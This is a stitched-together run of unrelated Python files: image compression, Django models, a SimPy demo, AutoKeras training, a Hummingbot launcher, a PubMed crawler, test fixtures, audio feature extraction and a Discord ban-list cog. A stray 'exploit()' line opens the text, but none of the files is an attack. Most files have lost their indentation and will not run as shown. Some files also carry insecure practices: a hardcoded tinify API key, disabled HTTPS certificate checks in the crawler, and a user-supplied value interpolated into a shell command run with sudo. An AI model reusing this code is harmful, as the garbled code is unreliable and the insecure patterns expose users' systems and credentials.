exploit()
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import tinify
import os
import os.path
tinify.key = "234-zhwWJVU50Y7X8b3FYEFtx8xWzVQv"
fromFilePath = ""
print "压缩图片脚本开始"
print "_____________________________________________\n"
index = 1;
sumOldfileByte = 0
sumnewfileByte = 0
for root, dirs, files in os.walk(fromFilePath):
for name in files:
fileName, fileSuffix = os.path.splitext(name)
if fileSuffix == '.png' or fileSuffix == '.jpg':
toFullPath = fromFilePath + root[len(fromFilePath):]
toFullName = toFullPath + '/' + name
fileByte = os.path.getsize(toFullName)
            if fileByte > 1024*20:
                print "Processing image #" + str(index) + ":"
                print toFullName
                print("Size before compression:")
print('%d Bytes'%(os.path.getsize(toFullName)))
sumOldfileByte = sumOldfileByte + os.path.getsize(toFullName)
index = index + 1
try:
source = tinify.from_file(toFullName)
source.to_file(toFullName)
except:
pass
print("压缩后体积:")
print('%d Bytes'%(os.path.getsize(toFullName)))
sumnewfileByte = sumnewfileByte + os.path.getsize(toFullName)
print "\n_____________________________________________"
print("压缩前总体积: " + str(sumOldfileByte) + "byte " + "约 " + str(sumOldfileByte/1024) + "kb " + str(sumOldfileByte/1024/1024) + "mb")
print("压缩后总体积: " + str(sumnewfileByte) + "byte " + "约 " + str(sumnewfileByte/1024) + "kb " + str(sumnewfileByte/1024/1024) + "mb")
print("压缩减少体积: " + str(sumOldfileByte - sumnewfileByte) + "byte" + "约 " + str((sumOldfileByte - sumnewfileByte)/1024) + "kb")
print "\n_____________________________________________"
print "压缩图片脚本结束"
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
class Domain(models.Model):
domain = models.CharField(_('domain'), max_length=128, unique=True)
description = models.CharField(_('description'), max_length=128, blank=True, null=True)
active = models.BooleanField(_('is active'), default=False)
aliases = models.BooleanField(_('allow aliases'), default=False)
mailboxes = models.BooleanField(_('has mailboxes'), default=False)
backupmx = models.BooleanField(_('backup MX records'), default=False)
transport = models.CharField(_('transport'), max_length=128, blank=True, null=True)
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta:
db_table = 'domains'
def __unicode__(self):
return u'%s' % self.domain
class Mailbox(models.Model):
domain = models.ForeignKey(Domain)
username = models.CharField(_('username'), max_length=255, unique=True,
help_text=_('Required. 255 characters or fewer. Letters, numbers and '
'@/./+/-/_ characters'))
password = models.CharField(_('password'), max_length=128)
maildir = models.CharField(_('mail directory'), max_length=128)
quote = models.PositiveIntegerField(_('quote'), default=0)
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta:
db_table = 'mailboxes'
verbose_name = 'mail box'
verbose_name_plural = 'mail boxes'
unique_together = ('domain', 'username')
def __unicode__(self):
return u'%s' % self.username
class Alias(models.Model):
alias = models.CharField(max_length=128)
mailbox = models.ForeignKey(Mailbox)
domain = models.ForeignKey(Domain, null=True, blank=True)
active = models.BooleanField(_('is active'), default=False)
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta:
db_table = 'aliases'
verbose_name = 'alias'
verbose_name_plural = 'aliases'
unique_together = ('alias', 'mailbox')
def __unicode__(self):
return u'%s for %s' % (self.alias, self.mailbox.username)
|
from django.contrib import admin
from main.models import Product, Clothing, UserPicture, Review
# Register your models here.
admin.site.register(Product)
admin.site.register(Clothing)
admin.site.register(UserPicture)
admin.site.register(Review) |
#!/usr/bin/env python2.7
# encoding: utf-8
"""
sim1.py
Created by Jakub Konka on 2011-04-20.
Copyright (c) 2011 University of Strathclyde. All rights reserved.
"""
import sys
import os
import SimPy.SimulationTrace as sim
class Car(sim.Process):
def __init__(self, name, cc):
sim.Process.__init__(self, name=name)
self.cc = cc
def go(self):
print("{0} {1} Starting".format(sim.now(), self.name))
yield sim.hold, self, 100.0
print("{0} {1} Arrived".format(sim.now(), self.name))
if __name__ == '__main__':
sim.initialize()
car1 = Car("Car1", 2000)
sim.activate(car1, car1.go(), at=6.0)
car2 = Car("Car2", 1600)
sim.activate(car2, car2.go())
sim.simulate(until=200)
print("Current time is {0}".format(sim.now()))
|
import numpy as np
import tensorflow as tf
import autokeras as ak
from tensorflow.keras.datasets import mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(60000, 28, 28, 1).astype('float32') / 256.
x_test = x_test.reshape(10000, 28, 28, 1).astype('float32') / 256.
from tensorflow.keras.utils import to_categorical
y_train = to_categorical(y_train)
y_test = to_categorical(y_test)
model = ak.ImageClassifier(
overwrite=True,
max_trials=1,
loss='mse'
)
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau
es = EarlyStopping(monitor='val_loss', mode='min', patience=6)
lr = ReduceLROnPlateau(monitor='val_loss', patience=3, factor=0.5, verbose=2)
ck = ModelCheckpoint('./keras3/', save_weights_only=True, save_best_only=True, monitor='val_loss')
model.fit(x_train, y_train, epochs=1, validation_split=0.2, callbacks=[es, lr, ck])
results = model.evaluate(x_test, y_test)
print(results)
# model.summary()
model2 = model.export_model()
model2.save('./keras3/save/aaa.h5')
best_model = model.tuner.get_best_model()
best_model.save('./keras3/save/best_aaa.h5')
# [loss , acc]
# [0.07032570987939835, 0.0036045669112354517] |
#!/usr/bin/env python
import path_util # noqa: F401
import argparse
import asyncio
import logging
from typing import (
Coroutine,
List,
)
import os
import subprocess
from hummingbot import (
check_dev_mode,
init_logging,
)
from hummingbot.client.hummingbot_application import HummingbotApplication
from hummingbot.client.config.global_config_map import global_config_map
from hummingbot.client.config.config_helpers import (
create_yml_files,
write_config_to_yml,
read_system_configs_from_yml,
update_strategy_config_map_from_file,
all_configs_complete,
)
from hummingbot.client.ui import login_prompt
from hummingbot.client.ui.stdout_redirection import patch_stdout
from hummingbot.core.utils.async_utils import safe_gather
from hummingbot.core.management.console import start_management_console
from bin.hummingbot import (
detect_available_port,
)
from hummingbot.client.settings import CONF_FILE_PATH
from hummingbot.client.config.security import Security
class CmdlineParser(argparse.ArgumentParser):
def __init__(self):
super().__init__()
self.add_argument("--config-file-name", "-f",
type=str,
required=False,
help="Specify a file in `conf/` to load as the strategy config file.")
self.add_argument("--wallet", "-w",
type=str,
required=False,
help="Specify the wallet public key you would like to use.")
self.add_argument("--config-password", "--wallet-password", "-p",
type=str,
required=False,
help="Specify the password to unlock your encrypted files and wallets.")
self.add_argument("--auto-set-permissions",
type=str,
required=False,
help="Try to automatically set config / logs / data dir permissions, "
"useful for Docker containers.")
def autofix_permissions(user_group_spec: str):
project_home: str = os.path.realpath(os.path.join(__file__, "../../"))
subprocess.run(f"cd '{project_home}' && "
f"sudo chown -R {user_group_spec} conf/ data/ logs/", capture_output=True, shell=True)
async def quick_start(args):
config_file_name = args.config_file_name
wallet = args.wallet
password = args.config_password
if args.auto_set_permissions is not None:
autofix_permissions(args.auto_set_permissions)
if password is not None and not Security.login(password):
logging.getLogger().error("Invalid password.")
return
await Security.wait_til_decryption_done()
await create_yml_files()
init_logging("hummingbot_logs.yml")
read_system_configs_from_yml()
hb = HummingbotApplication.main_application()
    # Todo: validate strategy and config_file_name before assigning
if config_file_name is not None:
hb.strategy_file_name = config_file_name
hb.strategy_name = update_strategy_config_map_from_file(os.path.join(CONF_FILE_PATH, config_file_name))
# To ensure quickstart runs with the default value of False for kill_switch_enabled if not present
if not global_config_map.get("kill_switch_enabled"):
global_config_map.get("kill_switch_enabled").value = False
if wallet and password:
global_config_map.get("ethereum_wallet").value = wallet
if hb.strategy_name and hb.strategy_file_name:
if not all_configs_complete(hb.strategy_name):
hb.status()
with patch_stdout(log_field=hb.app.log_field):
dev_mode = check_dev_mode()
if dev_mode:
hb.app.log("Running from dev branches. Full remote logging will be enabled.")
log_level = global_config_map.get("log_level").value
init_logging("hummingbot_logs.yml",
override_log_level=log_level,
dev_mode=dev_mode)
if hb.strategy_file_name is not None and hb.strategy_name is not None:
await write_config_to_yml(hb.strategy_name, hb.strategy_file_name)
hb.start(log_level)
tasks: List[Coroutine] = [hb.run()]
if global_config_map.get("debug_console").value:
management_port: int = detect_available_port(8211)
tasks.append(start_management_console(locals(), host="localhost", port=management_port))
await safe_gather(*tasks)
def main():
args = CmdlineParser().parse_args()
# Parse environment variables from Dockerfile.
# If an environment variable is not empty and it's not defined in the arguments, then we'll use the environment
# variable.
if args.config_file_name is None and len(os.environ.get("CONFIG_FILE_NAME", "")) > 0:
args.config_file_name = os.environ["CONFIG_FILE_NAME"]
if args.wallet is None and len(os.environ.get("WALLET", "")) > 0:
args.wallet = os.environ["WALLET"]
if args.config_password is None and len(os.environ.get("CONFIG_PASSWORD", "")) > 0:
args.config_password = os.environ["CONFIG_PASSWORD"]
# If no password is given from the command line, prompt for one.
if args.config_password is None:
if not login_prompt():
return
asyncio.get_event_loop().run_until_complete(quick_start(args))
if __name__ == "__main__":
main()
|
import pdb
x = [1,2,3]
y = 5
z = 6
a = y + z
print(a)
pdb.set_trace()
b = x + y # bug
print(b) |
"""PubMed Crawler of CSBC/PS-ON Publications.
author: nasim.sanati
author: milen.nikolov
author: verena.chung
"""
import os
import re
import argparse
import getpass
import ssl
from datetime import datetime
import requests
from Bio import Entrez
from bs4 import BeautifulSoup
import synapseclient
import pandas as pd
from alive_progress import alive_bar
def login():
"""Log into Synapse. If cached info not found, prompt user.
Returns:
syn: Synapse object
"""
try:
syn = synapseclient.login(silent=True)
except Exception:
print("Cached credentials not found; please provide",
"your Synapse username and password.")
username = input("Synapse username: ")
password = getpass.getpass("Synapse password: ").encode("utf-8")
syn = synapseclient.login(
username=username, password=password,
rememberMe=True, silent=True)
return syn
def get_args():
"""Set up command-line interface and get arguments."""
parser = argparse.ArgumentParser(
description="Scrap PubMed information from a list of grant numbers"
+ " and put the results into a CSV file. Table ID can be provided"
+ " if interested in only scrapping for new publications.")
# TODO: default to the grants table/view in the "CSBC PS-ON DB" project
parser.add_argument("-g", "--grantview_id",
type=str, default="syn21918972",
help="Synapse table/view ID containing grant numbers in"
+ " 'grantNumber' column. (Default: syn21918972)")
parser.add_argument("-t", "--table_id",
type=str,
help="Current Synapse table holding PubMed info.")
parser.add_argument("-f", "--table_file",
type=str,
help="Local file table holding PubMed info.")
parser.add_argument("-o", "--output",
type=str, default="publications_"
+ datetime.today().strftime('%m-%d-%Y'),
help="Filename for output CSV. (Default:"
+ " publications_<current-date>)")
return parser.parse_args()
def get_view(syn, table_id):
"""Get Synapse table/data view containing grant numbers.
Assumptions:
        Synapse table/view has column called 'grantNumber'
Returns:
dataframe: consortiums and their project descriptions.
"""
results = syn.tableQuery(
f"select * from {table_id}").asDataFrame()
return results[~results['grantNumber'].isnull()]
def get_grants(df):
"""Get list of grant numbers from dataframe.
Assumptions:
Dataframe has column called 'grantNumber'
Returns:
set: valid grant numbers, e.g. non-empty strings
"""
print(f"Querying for grant numbers...", end="")
grants = set(df.grantNumber.dropna())
print(f"{len(grants)} found\n")
return list(sorted(grants))
def get_pmids(grants, year_start=2018, year_end=2021):
"""Get list of PubMed IDs using grant numbers as search param.
Returns:
set: PubMed IDs
"""
print("Getting PMIDs from NCBI...")
all_pmids = set()
    # Brian's request: add check that pubs. are retrieved for each grant number
count = 1
for grant in grants:
print(f" {count:02d}. Grant number {grant}...", end="")
handle = Entrez.esearch(db="pubmed", term=grant,
datetype="pdat", mindate=year_start, maxdate=year_end,
retmax=1_000_000, retmode="xml", sort="relevance")
pmids = Entrez.read(handle).get('IdList')
handle.close()
all_pmids.update(pmids)
print(f"{len(pmids)} found")
count += 1
print(f"Total unique publications: {len(all_pmids)}\n")
return all_pmids
def parse_header(header):
"""Parse header div for pub. title, authors journal, year, and doi."""
# TITLE
title = header.find('h1').text.strip()
# JOURNAL
journal = header.find('button').text.strip()
# PUBLICATION YEAR
pub_date = header.find('span', attrs={'class': "cit"}).text
year = re.search(r"(\d{4}).*?[\.;]", pub_date).group(1)
# DOI
doi_cit = header.find(attrs={'class': "citation-doi"})
doi = doi_cit.text.strip().lstrip("doi: ").rstrip(".") if doi_cit else ""
# AUTHORS
authors = [parse_author(a) for a in header.find_all(
'span', attrs={'class': "authors-list-item"})]
authors = [a for a in authors if a]
return (title, journal, year, doi, authors)
def parse_author(item):
"""Parse author name from HTML 'author-list-item"""
try:
author = item.find('a', attrs={'class': "full-name"}).text
except AttributeError:
author = item.find('span', attrs={'class': "full-name"}).text
return author
def parse_grant(grant):
"""Parse for grant number from grant annotation."""
if len(grant):
grant = re.sub(r'RO', 'R0', grant)
grant_info = re.search(r"([A-Z][A-Z](\s|-)*\d{3,})[ /-]", grant, re.I)
if grant_info is not None:
grant_number = grant_info.group(1).upper()
return re.sub(r'(\s|-)', '', grant_number)
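# e.g. parse_grant("U54 CA209997/CA/NCI NIH HHS") -> "CA209997" (illustrative
# annotation string; returns None when no grant-like pattern is found)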
def get_related_info(pmid):
"""Get related information associated with publication.
    Entrez will be used for optimal retrieval (since NCBI will kick
    us out if we web-scrape too often).
Returns:
dict: XML results for GEO, SRA, and dbGaP
"""
handle = Entrez.elink(dbfrom="pubmed", db="gds,sra,gap", id=pmid,
remode="xml")
results = Entrez.read(handle)[0].get('LinkSetDb')
handle.close()
related_info = {}
for result in results:
db = re.search(r"pubmed_(.*)", result.get('LinkName')).group(1)
ids = [link.get('Id') for link in result.get('Link')]
handle = Entrez.esummary(db=db, id=",".join(ids))
soup = BeautifulSoup(handle, "lxml")
handle.close()
related_info[db] = soup
return related_info
def parse_geo(info):
"""Parse and return GSE IDs."""
gse_ids = []
if info:
tags = info.find_all('item', attrs={'name': "GSE"})
gse_ids = ["GSE" + tag.text for tag in tags]
return gse_ids
def parse_sra(info):
"""Parse and return SRX/SRP IDs."""
    srx_ids, srp_ids = [], []
if info:
tags = info.find_all('item', attrs={'name': "ExpXml"})
srx_ids = [re.search(r'Experiment acc="(.*?)"', tag.text).group(1)
for tag in tags]
srp_ids = {re.search(r'Study acc="(.*?)"', tag.text).group(1)
for tag in tags}
return srx_ids, srp_ids
def parse_dbgap(info):
"""Parse and return study IDs."""
gap_ids = []
if info:
tags = info.find_all('item', attrs={'name': "d_study_id"})
gap_ids = [tag.text for tag in tags]
return gap_ids
def make_urls(url, accessions):
"""Create NCBI link for each accession in the iterable.
Returns:
str: list of URLs
"""
url_list = [url + accession for accession in list(accessions)]
return ", ".join(url_list)
def scrape_info(pmids, curr_grants, grant_view):
"""Create dataframe of publications and their pulled data.
Returns:
df: publications data
"""
columns = ["doi", "journal", "pubMedId", "pubMedUrl",
"publicationTitle", "publicationYear", "keywords",
"authors", "grantNumber",
"gseAccns", "gseUrls", "srxAccns", "srxUrls",
"srpAccns", "srpUrls", "dbgapAccns", "dbgapUrls"]
if not os.environ.get('PYTHONHTTPSVERIFY', '') \
and getattr(ssl, '_create_unverified_context', None):
ssl._create_default_https_context = ssl._create_unverified_context
table = []
with alive_bar(len(pmids)) as progress:
for pmid in pmids:
session = requests.Session()
url = f"https://www.ncbi.nlm.nih.gov/pubmed/?term={pmid}"
soup = BeautifulSoup(session.get(url).content, "lxml")
# HEADER
# Contains: title, journal, pub. date, authors, pmid, doi
header = soup.find(attrs={'id': "full-view-heading"})
# PubMed utilizes JavaScript now, so content does not always
# fully load on the first try.
if not header:
soup = BeautifulSoup(session.get(url).content, "lxml")
header = soup.find(attrs={'id': "full-view-heading"})
title, journal, year, doi, authors = parse_header(header)
authors = ", ".join(authors)
# GRANTS
try:
grants = [g.text.strip() for g in soup.find(
'div', attrs={'id': "grants"}).find_all('a')]
# Filter out grant annotations not in consortia.
grants = {parse_grant(grant) for grant in grants}
# if re.search(r"CA\d", grant, re.I)}
grants = list(filter(lambda x: x in curr_grants, grants))
except AttributeError:
grants = []
# KEYWORDS
abstract = soup.find(attrs={"id": "abstract"})
try:
keywords = abstract.find(text=re.compile(
"Keywords")).find_parent("p").text.replace(
"Keywords:", "").strip()
except AttributeError:
keywords = ""
# RELATED INFORMATION
# Contains: GEO, SRA, dbGaP
related_info = get_related_info(pmid)
gse_ids = parse_geo(related_info.get('gds'))
gse_url = make_urls(
"https://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=", gse_ids)
srx, srp = parse_sra(related_info.get('sra'))
srx_url = make_urls("https://www.ncbi.nlm.nih.gov/sra/", srx)
srp_url = make_urls(
"https://trace.ncbi.nlm.nih.gov/Traces/sra/?study=", srp)
dbgap = parse_dbgap(related_info.get('gap'))
dbgap_url = make_urls(
"https://www.ncbi.nlm.nih.gov/projects/gap/cgi-bin/study.cgi?study_id=",
dbgap
)
row = pd.DataFrame(
[[doi, journal, pmid, url, title, year, keywords, authors,
grants, gse_ids, gse_url,
                  srx, srx_url, list(srp), srp_url, dbgap, dbgap_url]],
columns=columns)
table.append(row)
session.close()
# Save table
tmp_tbl = pd.concat(table)
tmp_tbl.to_csv("pubs_tmp.tsv", index=False, sep="\t", encoding="utf-8")
# Increment progress bar animation.
progress()
return pd.concat(table)
def find_publications(syn, args):
"""Get list of publications based on grants of consortia."""
grant_view = get_view(syn, args.grantview_id)
grants = get_grants(grant_view)
pmids = get_pmids(grants)
    # If user provided a table ID, only scrape info from
# publications not already listed in the provided table.
if args.table_id:
print(f"Comparing with table {args.table_id}...")
current_publications = syn.tableQuery(
f"select * from {args.table_id}").asDataFrame()
current_pmids = {re.search(r"[/=](\d+)$", i).group(1)
for i in list(current_publications.pubMedUrl)}
pmids -= current_pmids
print(f" New publications found: {len(pmids)}\n")
    # If user provided a table file, only scrape info from
# publications not already listed in the provided table.
if args.table_file:
print(f"Comparing with table {args.table_file}...")
current_publications = pd.read_csv(args.table_file, sep='\t')
current_pmids = {re.search(r"[/=](\d+)$", i).group(1)
for i in list(current_publications.pubMedUrl)}
pmids -= current_pmids
print(f" New publications found: {len(pmids)}\n")
print(f"Pulling information from publications...")
table = scrape_info(sorted(pmids), grants, grant_view)
table.to_csv(args.output + ".tsv", index=False, sep="\t", encoding="utf-8")
print("DONE")
def main():
"""Main function."""
syn = login()
args = get_args()
# In order to make >3 Entrez requests/sec, 'email' and 'api_key'
# params need to be set.
Entrez.email = os.getenv('ENTREZ_EMAIL')
Entrez.api_key = os.getenv('ENTREZ_API_KEY')
find_publications(syn, args)
if __name__ == "__main__":
main()
|
from copy import deepcopy
from datetime import date, timedelta
from docx.document import Document
from docx.oxml import CT_P, CT_Tbl
from docx.table import _Cell, Table
from docx.text.paragraph import Paragraph
from onegov.translator_directory.collections.certificate import \
LanguageCertificateCollection
from onegov.translator_directory.collections.language import LanguageCollection
from onegov.translator_directory.collections.translator import \
TranslatorCollection
from onegov.translator_directory.models.translator import GENDERS
translator_data = dict(
state='published',
pers_id=1234,
first_name='Hugo',
last_name='Benito',
admission=None,
withholding_tax=False,
self_employed=False,
gender=list(GENDERS.keys())[0],
date_of_birth=date.today(),
nationality='CH',
address='Downing Street 5',
zip_code='4000',
city='Luzern',
drive_distance=None,
social_sec_number='756.1234.4568.90',
bank_name='R-BS',
bank_address='Bullstreet 5',
account_owner='Hugo Benito',
iban='',
email='hugo@benito.com',
tel_mobile='079 000 00 00',
tel_office='041 444 44 44',
tel_private=None,
availability='always',
profession='craftsman',
occupation='baker',
operation_comments='',
confirm_name_reveal=None,
date_of_application=date.today() - timedelta(days=100),
date_of_decision=date.today() - timedelta(days=50),
proof_of_preconditions='all okay',
agency_references='Some ref',
education_as_interpreter=False,
comments=None,
expertise_professional_guilds=tuple(),
expertise_professional_guilds_other=tuple(),
expertise_interpreting_types=tuple()
)
def create_languages(session):
languages = []
collection = LanguageCollection(session)
for lang in ('German', 'French', 'Italian', 'Arabic'):
languages.append(collection.add(name=lang))
return languages
def create_certificates(session):
certs = []
collection = LanguageCertificateCollection(session)
for cert in ('AAAA', 'BBBB', 'CCCC', 'DDDD'):
certs.append(collection.add(name=cert))
return certs
def create_translator(translator_app, email=None, **kwargs):
data = deepcopy(translator_data)
for key in kwargs:
if key in data:
data[key] = kwargs[key]
if email:
data['email'] = email
return TranslatorCollection(translator_app).add(**data)
def create_translators(translator_app, count=1):
translators = TranslatorCollection(translator_app)
results = []
for i in range(count):
data = deepcopy(translator_data)
data['pers_id'] = i
data['email'] = f'translator{i}@test.com'
        data['first_name'] = f'trans_{i}'
        data['last_name'] = f'later_{i}'
results.append(translators.add(**data))
return results
def iter_block_items(parent):
""" Recursively iterates over the elements of the .docx document.
Only use this for testing.
See `https://github.com/python-openxml/python-docx/issues/40`
"""
if isinstance(parent, Document):
parent_elm = parent.element.body
elif isinstance(parent, _Cell):
parent_elm = parent._tc
else:
raise ValueError("Error parsing word file. ")
for child in parent_elm.iterchildren():
if isinstance(child, CT_P):
yield Paragraph(child, parent)
elif isinstance(child, CT_Tbl):
table = Table(child, parent)
for row in table.rows:
for cell in row.cells:
yield from iter_block_items(cell)
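# Minimal usage sketch (illustrative, assuming a local 'example.docx'):
#
#     import docx
#     for block in iter_block_items(docx.Document('example.docx')):
#         print(block.text)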
|
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import librosa
import librosa.display
import warnings
warnings.filterwarnings('ignore')
''' FMA '''
# MFCC
for folder in os.scandir('../data/project_data/mini/fma'):
    print(str(folder)[-5:-2])
files = []
labels = []
zcrs = []
spec_centroids = []
spec_rolloffs = []
mfccs_1 = []
mfccs_2 = []
mfccs_3 = []
mfccs_4 = []
mfccs_5 = []
mfccs_6 = []
mfccs_7 = []
mfccs_8 = []
mfccs_9 = []
mfccs_10 = []
mfccs_11 = []
mfccs_12 = []
mfccs_13 = []
mfccs_14 = []
mfccs_15 = []
mfccs_16 = []
mfccs_17 = []
mfccs_18 = []
mfccs_19 = []
mfccs_20 = []
    for file in librosa.util.find_files(folder):
label = str(file).split('.')[0][43:]
if label in ['experimental', 'instrumental', 'international']:
continue
y, sr = librosa.core.load(file)
filename = str(file)[43:]
files.append(filename)
        labels.append(label)
# Calculating zero-crossing rates
zcr = librosa.feature.zero_crossing_rate(y)
zcrs.append(np.mean(zcr))
# Calculating the spectral centroids
spec_centroid = librosa.feature.spectral_centroid(y)
spec_centroids.append(np.mean(spec_centroid))
# Calculating the spectral rolloffs
spec_rolloff = librosa.feature.spectral_rolloff(y)
spec_rolloffs.append(np.mean(spec_rolloff))
        # Calculating the first 20 MFCC coefficients
mfcc = librosa.feature.mfcc(y=y, sr=sr, hop_length=512, n_mfcc=20)
mfcc_scaled = np.mean(mfcc.T, axis=0)
mfccs_1.append(mfcc_scaled[0])
mfccs_2.append(mfcc_scaled[1])
mfccs_3.append(mfcc_scaled[2])
mfccs_4.append(mfcc_scaled[3])
mfccs_5.append(mfcc_scaled[4])
mfccs_6.append(mfcc_scaled[5])
mfccs_7.append(mfcc_scaled[6])
mfccs_8.append(mfcc_scaled[7])
mfccs_9.append(mfcc_scaled[8])
mfccs_10.append(mfcc_scaled[9])
mfccs_11.append(mfcc_scaled[10])
mfccs_12.append(mfcc_scaled[11])
mfccs_13.append(mfcc_scaled[12])
mfccs_14.append(mfcc_scaled[13])
mfccs_15.append(mfcc_scaled[14])
mfccs_16.append(mfcc_scaled[15])
mfccs_17.append(mfcc_scaled[16])
mfccs_18.append(mfcc_scaled[17])
mfccs_19.append(mfcc_scaled[18])
mfccs_20.append(mfcc_scaled[19])
df = pd.DataFrame({
'files': files,
'zero_crossing_rate': zcrs,
'spectral_centroid': spec_centroids,
'spectral_rolloff': spec_rolloffs,
'mfcc_1': mfccs_1,
'mfcc_2': mfccs_2,
'mfcc_3': mfccs_3,
'mfcc_4': mfccs_4,
'mfcc_5': mfccs_5,
'mfcc_6': mfccs_6,
'mfcc_7': mfccs_7,
'mfcc_8': mfccs_8,
'mfcc_9': mfccs_9,
'mfcc_10': mfccs_10,
'mfcc_11': mfccs_11,
'mfcc_12': mfccs_12,
'mfcc_13': mfccs_13,
'mfcc_14': mfccs_14,
'mfcc_15': mfccs_15,
'mfcc_16': mfccs_16,
'mfcc_17': mfccs_17,
'mfcc_18': mfccs_18,
'mfcc_19': mfccs_19,
'mfcc_20': mfccs_20,
'labels': labels
})
print(df)
    df.to_csv('./project/mini/data/fma_genres_mfcc_{}.csv'.format(str(folder)[-5:-2]), index=False)
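    # A more compact alternative to the twenty mfcc_* lists above (a sketch,
    # not used by this script): build one row per file and name the columns
    # programmatically.
    #
    #     columns = (['files', 'zero_crossing_rate', 'spectral_centroid',
    #                 'spectral_rolloff']
    #                + ['mfcc_{}'.format(i) for i in range(1, 21)] + ['labels'])
    #     df = pd.DataFrame(rows, columns=columns)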
|
import json
import asyncio
import traceback
from typing import Sequence
from datetime import datetime, timedelta
import aiosqlite
from discord.ext import commands
from potato_bot.bot import Bot
from potato_bot.cog import Cog
from potato_bot.types import Job, UserID
from potato_bot.utils import minutes_to_human_readable
from potato_bot.checks import is_admin
from potato_bot.constants import SERVER_HOME
# TODO: remove these
class BanEntry:
def __init__(
self,
user_id,
user_name,
minutes,
date,
reason,
ip,
client_id,
admin_id,
admin_name,
):
self.user_id = user_id
self.user_name = user_name
self.minutes = int(minutes)
self.date = date
self.reason = reason
self.ip = ip
self.client_id = client_id
self.admin_id = admin_id
self.admin_name = admin_name
@classmethod
def from_file(cls, data):
return cls(
user_id=data["userId"],
user_name=data["userName"],
minutes=data["minutes"],
date=data["dateTimeOfBan"],
reason=data["reason"],
ip=data["ipAddress"],
client_id=data["clientId"],
admin_id=data["adminId"],
admin_name=data["adminName"],
)
def to_dict(self):
return {
"userId": self.user_id,
"userName": self.user_name,
"minutes": self.minutes,
"dateTimeOfBan": self.date,
"reason": self.reason,
"ipAddress": self.ip,
"clientId": self.client_id,
"adminId": self.admin_id,
"adminName": self.admin_name,
}
@property
def title(self):
return self.reason.split("\n")[0]
@property
def expired(self):
date = self.date
minutes = self.minutes
# https://discord.com/channels/273774715741667329/312454684021620736/781461129427681310
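        # The literal '0' after %f consumes a seventh fractional-second digit
        # in the server's .NET-style timestamp (Python's %f accepts at most
        # six digits); this assumes that seventh digit is always '0'.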
parsed_date = datetime.strptime(
date.replace(" ", ""), "%Y-%m-%dT%H:%M:%S.%f0%z"
)
return parsed_date + timedelta(minutes=minutes) < datetime.now(
tz=parsed_date.tzinfo
)
class UserEntry:
def __init__(self, id, name, duration, ban_count):
self.id = id
self.name = name
self.duration = int(duration)
self.ban_count = ban_count
class Bans(Cog):
"""Ban related commands"""
def __init__(self, bot: Bot):
super().__init__(bot)
self.bans_file = SERVER_HOME / "admin" / "banlist.json"
self.job_bans_file = SERVER_HOME / "admin" / "jobBanlist.json"
self._start_tasks()
def _start_tasks(self):
self.bot.loop.create_task(
self._watch_task(self.bans_file, self._bans_file_modified)
)
self.bot.loop.create_task(
self._watch_task(self.job_bans_file, self._job_bans_file_modified)
)
@commands.group(invoke_without_command=True, ignore_extra=False)
async def bans(self, ctx):
"""List bans"""
users = await self.fetch_all_users()
if not users:
return await ctx.send("No bans recorded yet")
users = sorted(users, key=lambda u: u.name.lower())
total_duration = minutes_to_human_readable(sum(u.duration for u in users))
await ctx.send(
f"Bans: **{sum(u.ban_count for u in users)}**\nDuration: **{total_duration}**"
)
paginator = commands.Paginator(
prefix="```",
suffix="```",
)
for i, user in enumerate(users):
paginator.add_line(
f"{i + 1:>2}. {user.name}: {user.ban_count} bans, {minutes_to_human_readable(user.duration)}"
)
for page in paginator.pages:
await ctx.send(page)
def _ban_expired(self, date: str, minutes: int):
# https://discord.com/channels/273774715741667329/312454684021620736/781461129427681310
parsed_date = datetime.strptime(
date.replace(" ", ""), "%Y-%m-%dT%H:%M:%S.%f0%z"
)
return parsed_date + timedelta(minutes=minutes) < datetime.now(
tz=parsed_date.tzinfo
)
def _bans_to_paginator(self, bans: Sequence[aiosqlite.Row]) -> commands.Paginator:
user_id = bans[0]["userId"]
total_duration = minutes_to_human_readable(
int(sum(ban["minutes"] for ban in bans))
)
paginator = commands.Paginator(
prefix=f"`{user_id}` has **{len(bans)}** ban(s) for **{total_duration}** in total```"
)
longest_index = len(str(len(bans)))
for i, ban in enumerate(bans):
title = ban["reason"].split("\n")[0]
ban_expired = self._ban_expired(ban["dateTimeOfBan"], ban["minutes"])
paginator.add_line(
f"{i + 1:>{longest_index}}{'.' if ban_expired else '!'} {ban['adminName']}: {title}"
)
return paginator
@bans.command(name="name")
async def _name_bans(self, ctx, user_name: str):
"""Fetch user bans using name"""
async with ctx.db.cursor() as cur:
await cur.execute(
"""
SELECT a.userId
FROM bans a
INNER JOIN bans b
ON
a.userName = b.userName
AND a.userId != b.userId
AND a.userName = ? COLLATE NOCASE
GROUP BY a.userId
""",
(user_name,),
)
conflicts = await cur.fetchall()
nl = "\n"
if conflicts:
return await ctx.send(
f"Conflicting IDs detected for name **{user_name}**: ```\n{nl.join(c['userId'] for c in conflicts)}```"
)
await cur.execute(
"""
SELECT
userId,
userName,
dateTimeOfBan,
minutes,
reason,
adminName
FROM bans
WHERE userName = ? COLLATE NOCASE
""",
(user_name,),
)
bans = await cur.fetchall()
if not bans:
return await ctx.send("No bans recorded for name")
paginator = self._bans_to_paginator(bans)
for page in paginator.pages:
await ctx.send(page)
@bans.command(name="id")
async def _id_bans(self, ctx, user_id: UserID):
"""Fetch user bans using id"""
async with ctx.db.cursor() as cur:
await cur.execute(
"""
SELECT
userId,
userName,
dateTimeOfBan,
minutes,
reason,
adminName
FROM bans
WHERE userId = ?
""",
(user_id,),
)
bans = await cur.fetchall()
if not bans:
return await ctx.send("No bans recorded for id")
paginator = self._bans_to_paginator(bans)
for page in paginator.pages:
await ctx.send(page)
@commands.command(aliases=["ub"])
@is_admin()
async def unban(self, ctx, user_id: UserID):
"""
Add unban to queue
        Unbans are only applied after the server restarts
"""
async with ctx.db.cursor(commit=True) as cur:
await cur.execute(
"INSERT INTO unban_queue (user_id) VALUES (?)", (user_id,)
)
await ctx.send(f"Added `{user_id}` to unban queue")
